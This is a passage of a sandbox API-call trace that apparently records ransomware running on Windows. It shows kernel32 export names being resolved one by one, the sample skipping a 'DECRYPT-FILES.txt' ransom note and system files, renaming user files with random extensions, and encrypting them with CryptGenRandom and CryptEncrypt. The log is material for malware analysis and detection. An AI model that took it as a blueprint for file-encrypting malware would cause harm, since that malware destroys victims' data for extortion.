lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0076.610] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0076.610] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0076.610] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0076.610] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0076.610] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0076.610] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0076.610] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0076.610] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0076.610] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0076.611] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0076.611] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0076.611] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0076.611] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0076.611] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0076.611] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0076.611] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0076.611] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0076.611] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0076.611] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0076.611] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0076.611] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0076.611] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0076.611] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0076.611] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0076.611] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0076.612] lstrcpyW (in: lpString1=0x10d0000, lpString2="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" | out: lpString1="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890" [0076.612] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt") returned 66 [0076.612] wsprintfW (in: param_1=0x3f2dea4, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt.3uxU") returned 71 [0076.612] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1v9ofdijwpm8mhhq.odt"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\1v9OFDiJWPm8MHHQ.odt.3uxU" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\1v9ofdijwpm8mhhq.odt.3uxu"), dwFlags=0x0) returned 1 [0076.612] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.613] VirtualFree (lpAddress=0x10d0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.613] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.613] FindNextFileW (in: hFindFile=0x5f8c58, lpFindFileData=0x3f2eed4 | out: lpFindFileData=0x3f2eed4*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xa2de0240, ftCreationTime.dwHighDateTime=0x1d4c56e, ftLastAccessTime.dwLowDateTime=0xfbc8d270, ftLastAccessTime.dwHighDateTime=0x1d4d178, ftLastWriteTime.dwLowDateTime=0xfbc8d270, ftLastWriteTime.dwHighDateTime=0x1d4d178, nFileSizeHigh=0x0, nFileSizeLow=0x1415b, dwReserved0=0x0, dwReserved1=0x0, cFileName="5hXhWeztPrf9ZQC1Z.png", cAlternateFileName="5HXHWE~1.PNG")) returned 1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="DECRYPT-FILES.txt") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="autorun.inf") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="boot.ini") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="desktop.ini") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="ntuser.dat") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="iconcache.db") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="bootsect.bak") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="ntuser.dat.log") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="thumbs.db") returned -1 [0076.613] lstrcmpiW (lpString1="5hXhWeztPrf9ZQC1Z.png", lpString2="Bootfont.bin") returned -1 [0076.613] lstrlenW (lpString="5hXhWeztPrf9ZQC1Z.png") returned 21 [0076.614] lstrcmpiW (lpString1="png", lpString2="lnk") returned 1 [0076.614] lstrcmpiW (lpString1="png", lpString2="exe") returned 1 [0076.614] lstrcmpiW (lpString1="png", lpString2="sys") returned -1 [0076.614] lstrcmpiW (lpString1="png", lpString2="dll") returned 1 [0076.614] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned 46 [0076.614] lstrlenW (lpString="5hXhWeztPrf9ZQC1Z.png") returned 21 [0076.614] lstrcpyW (in: lpString1=0x3f2e6a4, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\" [0076.614] lstrcatW (in: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\", lpString2="5hXhWeztPrf9ZQC1Z.png" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png" [0076.614] VirtualAlloc (lpAddress=0x0, dwSize=0x28, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.614] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\5hXhWeztPrf9ZQC1Z.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\roaming\\5hxhweztprf9zqc1z.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x440 [0076.614] GetFileSizeEx (in: hFile=0x440, lpFileSize=0x3f2de70 | out: lpFileSize=0x3f2de70*=82267) returned 1 [0076.614] CreateFileMappingW (hFile=0x440, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x444 [0076.614] MapViewOfFile (hFileMappingObject=0x444, dwDesiredAccess=0x2, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x0) returned 0x10d0000 [0076.614] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x20, pbBuffer=0xfb0000 | out: pbBuffer=0xfb0000) returned 1 [0076.614] CryptGenRandom (in: hProv=0x61eb40, dwLen=0x8, pbBuffer=0xfb0020 | out: pbBuffer=0xfb0020) returned 1 [0076.615] VirtualAlloc (lpAddress=0x0, dwSize=0x108, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.615] CryptEncrypt (in: hKey=0x5f8a98, hHash=0x0, Final=1, dwFlags=0x0, pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x28, dwBufLen=0x100 | out: pbData=0xfc0000*, pdwDataLen=0x3f2ddd8*=0x100) returned 1 [0076.615] VirtualAlloc (lpAddress=0x0, dwSize=0x1001, flAllocationType=0x3000, flProtect=0x4) returned 0x10f0000 [0076.617] VirtualFree (lpAddress=0x10f0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.617] UnmapViewOfFile (lpBaseAddress=0x10d0000) returned 1 [0076.618] CloseHandle (hObject=0x444) returned 1 [0076.618] SetFilePointerEx (in: hFile=0x440, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0076.618] WriteFile (in: hFile=0x440, lpBuffer=0xfc0000*, nNumberOfBytesToWrite=0x108, lpNumberOfBytesWritten=0x3f2ddf8, lpOverlapped=0x0 | out: lpBuffer=0xfc0000*, lpNumberOfBytesWritten=0x3f2ddf8*=0x108, lpOverlapped=0x0) returned 1 [0076.619] CloseHandle (hObject=0x0) returned 0 [0076.619] CloseHandle (hObject=0x440) returned 1 [0076.620] VirtualFree (lpAddress=0xfc0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.620] VirtualFree (lpAddress=0xfb0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0076.620] GetTickCount () returned 0x114baa8 [0076.620] VirtualAlloc (lpAddress=0x0, dwSize=0x18, flAllocationType=0x3000, flProtect=0x4) returned 0xfb0000 [0076.621] lstrlenW (lpString="qwertyuiopasdfghjklzxcvbnmQWERTYUIOPASDFGHJKLZXCVBNM1234567890") returned 62 [0076.621] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0xfc0000 [0076.621] VirtualAlloc (lpAddress=0x0, dwSize=0x7e, flAllocationType=0x3000, flProtect=0x4) returned 0x10d0000 [0076.621] lstrlenA (lpString="kernel32.dll") returned 12 [0076.621] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x76c20000 [0076.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0076.621] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0076.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0076.621] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0076.621] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0076.622] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0076.622] lstrlenA (lpString="ADDATOMA") returned 8 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0076.622] lstrlenA (lpString="ADDATOMW") returned 8 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0076.622] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0076.622] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0076.622] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0076.622] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0076.622] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0076.622] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0076.622] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0076.622] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0076.622] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0076.622] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0076.622] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0076.622] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0076.622] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0076.622] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0076.622] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0076.622] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0076.623] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0076.623] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0076.623] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0076.623] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0076.623] lstrlenA (lpString="BACKUPREAD") returned 10 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0076.623] lstrlenA (lpString="BACKUPSEEK") returned 10 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0076.623] lstrlenA (lpString="BACKUPWRITE") returned 11 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0076.623] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0076.623] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0076.623] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0076.623] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0076.623] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0076.623] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0076.623] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0076.623] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0076.623] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0076.623] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0076.632] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0076.632] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0076.632] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0076.632] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0076.632] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0076.632] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0076.632] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0076.632] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0076.632] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0076.632] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0076.632] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0076.632] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0076.632] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0076.632] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0076.632] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0076.633] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0076.633] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0076.633] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0076.633] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0076.633] lstrlenA (lpString="BEEP") returned 4 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0076.633] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0076.633] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0076.633] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0076.633] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0076.633] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0076.633] lstrcpyA (in: lpString1=0x3f2d1ec, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0076.633] lstrlenA 